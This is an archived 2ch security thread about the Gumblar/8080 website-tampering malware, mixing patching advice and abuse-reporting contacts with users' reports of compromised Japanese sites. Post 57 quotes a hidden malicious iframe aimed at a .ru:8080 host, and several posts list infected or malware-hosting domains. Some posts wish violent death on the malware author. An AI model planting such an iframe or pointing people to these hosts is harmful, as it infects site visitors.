1read 100read
2012年6月セキュリティ70: 【Gumblar/GENO】Web改竄ウイルス総合10【8080】 (968) TOP カテ一覧 スレ一覧 2ch元 削除依頼
[Firewall ] PCGATE [もってる香具師集合] (331)
ハッカーになる方法 (370)
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor (894)
Counterspy (237)
気持ち悪い女の顔が (225)
【併用可】gred AntiVirusアクセラレータ part3 (840)

【Gumblar/GENO】Web改竄ウイルス総合10【8080】


1 :10/07/21 〜 最終レス :12/07/04
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1274675964/

2 :
Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

3 :
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

4 :
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  ※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす

5 :
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html

6 :
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support

7 :
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html

8 :
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

9 :
>>1-8
テンプレ乙

10 :
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1278430098/
なんでこっちじゃいかんの?

11 :
998 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:27:53
取扱注意
www●kakiyasuhonten●co●jp
999 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp

12 :
ちょw柿安本店てw

13 :
どっか stuxnet 取り扱ってるスレ無いかしら?
スレチ承知スマソだけど8080使いそうで怖すぎる

14 :
いちおexploit-dbに転がってるけど(コンセプトコードか実物は知らん)、
今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。

15 :
22日21時に、8080の検体を収集しにいったけんど、特に変化
なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
ttp://www.virustotal.com/isis/42c9f334b7de4a63ed92be606a650d59771fb354fa49f4399d098c24529c925d-1279803865

16 :
>>15
検体欲しぃの

17 :
ttp://internet.watch.impress.co.jp/docs/news/20100722_382380.html
コーエーテクモもGumblar感染?

18 :
別だろ。Gumblarの目的はbotnetの構築と
botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。

19 :
こえー

20 :
今のガンブラーってScript系だから、殆ど検出されるんじゃね?

21 :
//www.crimsontech.jp/jp/ddp/index.html

22 :
無言でURLだけ貼るなよ

23 :
//store.nextbusinesssystem.com/
あぅあぅ〜

24 :
感染サイトならドットを●に変換しろよ

25 :
>>21
pantscow●ru:8080/CD-ROM●js
凸っておきました

26 :
マスターペニス

27 :
>>17
SQLインジェクション系攻撃にやられたんじゃねーの?
うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断+Webファイアウォール導入だな

28 :
カスペルスキーのGumblar-x駆除ツール
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
を使用したところ
Spliced functions という値が32(ほかの値は0)という結果が表示されました
何度かツールを実行したのですが Spliced functions の値がずっと 1 のままです。
これは既に感染していると考えてよろしいのでしょうか?

29 :
カスペスレで聞けよ

30 :
Gumblarってなんでruが多いの?

31 :
ttp://www.securelist.com/en/blog/2132/Gumblar_Farewell_Japan

32 :
本家gumblarはあちこちなんじゃね。
そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。

33 :
martuzもcnだった。

34 :
>>31
まだ読んでないけど、実際はUSが多いのかthx
>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね

35 :
そりゃRBNあたりがやってんでしょ

36 :
>>21
www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ
対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ
で、本スレどっち…

37 :
民間のセキュリティ企業がFBIのサイバー犯罪捜査に協力、スロベニアでハッカーを逮捕
http://pandajapanblogs.blogspot.com/2010/07/fbi.html

38 :
ほんと>>37のニュースみたいにGumblarの作者が逮捕されるか射殺されればいいのに…

39 :
射殺はかわいそうだろ。
感染PC全部駆除の刑。

40 :
565 名前:大人も子供も名無しさんも再び[sage] 投稿日:2010/07/30(金) 21:05:39 ID:pHxHBUIQ
ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ
497 名前:名無しさん必死だな[sage] 投稿日:2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな
任天堂HPにもGumblarか?

41 :
ウェブ担当のミスじゃねーの?

42 :
Gumblar作者を頃したいと思う人は多いだろうな
本当にばいいのに

43 :
ゼロデイならともかく既知の脆弱性を放置してやられる方にも問題あると思うぞ
鍵開けてたら泥棒に入られましたみたいな

44 :
泥棒より放火魔に例える方があっているな。
放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。

45 :
>>43>>44
PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ

46 :
>>43-45
日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなw
壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(キリッ」
(´・ω・`)

47 :
止まらぬサイト改ざん:訪問の心あたりはありませんか〜新規告知サイト14件
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2307

48 :
Google Chrome(Win版)や、IE8+保護モード(Vista/7)で防げるのに
いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ
Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき

49 :
Win7で、Firefox+Noscript/RequestPolicyと、Google Chrome
どっちが安全?

50 :
どんな道具を使おうと使う人間がアホなら穴だらけ。
このソフトなら安全と過信している時点でその類だよ。
そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。

51 :
Gumblarのみを考えた場合、感染の確率が低い方はどっち?
RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの?

52 :
しつこいぞカス

53 :
ググったらなんとなくわかったからいいや
ttp://blog.fourteenforty.jp/blog/2010/04/windows-xpgoogl.html
スレ汚し失礼

54 :
二度と来るなよ

55 :
取扱注意
www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…

56 :
てす

57 :
【陥落サイトのURL悪用厳禁】
■現行型
チャイナ・テーブル 八菜香
398133●com/
当選者発表|柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつw
■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶・茶器・雑貨専門店
www●lalacha●com/

<iframe src=”hxxp://parkperson●ru:8080/index●php?pid=13” width=”0” height=”0” style=”display:none”></iframe>
■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/

58 :
柿安 める凸完了
他は知らんw

59 :
柿安から返信&該当ページの消滅を確認。
--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
〜〜中略〜〜
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。

60 :
Webサイトの大規模改ざんでオンラインゲームサイトが標的に
http://itpro.nikkeibp.co.jp/article/COLUMN/20100801/350884/

61 :
dansen.co.jp
これは新しい…

62 :
ttp://www.dansen.co.jp/

63 :
jsのこれ?
/*SOS*/
飛び先はNortonセーフウェブで黒判定。

64 :
って、飛び先が真っ黒なのを確認すた。>>63

65 :
>>64
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認
youhelpnow●ru:8080

66 :
ノーガードでこのスレに貼られたサイトよく見てるのにまだ一度もやられたことない
やられるやつって相当アホだろ

67 :
>>63
全cssの末尾に何か付いてる

68 :
>>67
どもです。
cssにも付くようになったのね。。。

69 :
>>67-68
末尾「.txt」にして送付、ひげおじさんからお返事。
> 〜.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

70 :
ttp://safeweb.norton.com/report/show?url=http://www.dansen.co.jp/
これマジ?

71 :
[国際110番・20スパム紹介・今月のスパム日記]
http://www.fuzita.org/spams/spamdiary.html
<html><head><script>location = 'http://xxxxxx/';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる

72 :
>>70
\(^o^)/オワタ

73 :
>>70
\(^o^)/直リンクw

74 :
>>62
Exploit.HTML.HCP.a

75 :
>>62
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/isis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616
>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか

76 :
>>61-62 消えたw

77 :
注入箇所削除の後告知なしで再開。
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。
2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。

78 :
大量の「禿.js」を装填中w
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1

79 :
http://2chmatomeluo.web.fc2.com/

80 :
>>78と同じやつ
www●dousoukainet●jp/plan●asp

81 :
今のところ「禿.js」を防ぐセキュリティソフトは皆無か

82 :
また凝りもせず新型を作りやがったのか
本気で作者を頃してやりたいわ
つーか本気でよ銃殺されろ
作者の国に核落とされて滅んじまえ

83 :
>>81
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。
逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。

84 :
>>81
*/yahoo.js*
全部蹴ればええやんw

85 :
>>82
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな

86 :
311 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 02:29:59 ID:1TXtyzUW0
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
http://www.dousoukainet.jp/plan.asp
だから言わんこっちゃない┐(VДV)┌
336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)
387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど
411 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
(VДV)部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!
俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):
416 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお
(VдV)踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪

87 :
iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ
http://www.itmedia.co.jp/enterprise/articles/1008/12/news061.html
とうとうWinだけの問題じゃなくなってきたな

88 :
>>86
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する

89 :
>>86
これはどういうウイルスですか?

90 :
>>86
これ踏んじゃったんだけどJavaScript切っていれば大丈夫?

91 :
>>86
これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?

92 :
>>91
おk

93 :
>>89
ネトゲのトロイ。

94 :
同窓会ネット aguse、gredどちらも無反応なのだが

95 :
gumblarじゃないからじゃね

96 :
禿もガンブラーもjs切っておけば問題なし

97 :
>>95
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?

98 :
というかさ、こんなのに感染する奴って何も設定変えてないIEでインターネットしてる初心者だけ
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから

99 :
それは言える
>>2よりも>>4こっちが最優先

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
【Hackme】ハッキング力検定サイトHackme Lv3 (349)
[Check Point] VPN-1/FireWall-1 CF1 (736)
ウイルスバスター2011の無効化について (655)
セキュリティー:まずこれをやれ/Linux編 (214)
★★脆弱ってどう読むの?★★ (445)
Yahoo知恵袋セキュカテの投稿内容を考察するスレ (556)
--log9.info------------------
【Wii】シャイニングフォース・ギアpart2 (889)
幻想水滸伝イケメン&美女ランキング (480)
シレン3 反省会場 19スレ目 (960)
後味が悪かったイベント 2件目 (532)
神代學園幻光録 クル・ヌ・ギ・ア3 (835)
TOAのティアのライバルはズバリSO3の黒豆 (478)
亡びの風をその身に受けるスレ (538)
どんなRPGがやりたいか貴様らかいていけ (418)
【PS3】剣と魔法と学園モノ。総合pt10【ととモノ】 (526)
Fallout3であった面白い出来事 Vault11 (245)
【PS3】ダーククエスト〜Alliance〜 Act2 (749)
テイルズやってる女の子ちょっと来い (742)
ジューダスってリオンじゃね?3 (325)
Neorude〜ネオリュード〜【ハーミア2個目】 (239)
【PS3】白騎士物語 オンライン募集スレ LEVEL1 (374)
死人が生き返るRPGはクソ (371)
--log55.com------------------
【米輸入制限】トランプ大統領、対日圧力強化を示唆 米紙報道「日本の指導者との良好な関係終わる」★7
【北海道地震】KDDI、沖合の船を使って携帯電話の電波を復旧させると発表。船舶型基地局の運用は日本初
【安倍首相】 無電柱化進める考え ★6
【北海道地震】割り箸や使い捨てスプーンが不足。むかわ町の災害対策本部が提供してほしいと呼び掛け★2
【北海道地震】札幌市のススキノでネオン復活。「元気出る」との一方で「節電の意味がない」ど自粛を求める声も
【東名事故デマ】11人全員不起訴 あおり運転別人を中傷 専門家「書き込みで民事上の損害賠償責任を負う可能性もある」
【山口】瓦そば号とふくさし号 川棚温泉でEV貸し出し
◆◆◆スレッド作成依頼スレ★1218◆◆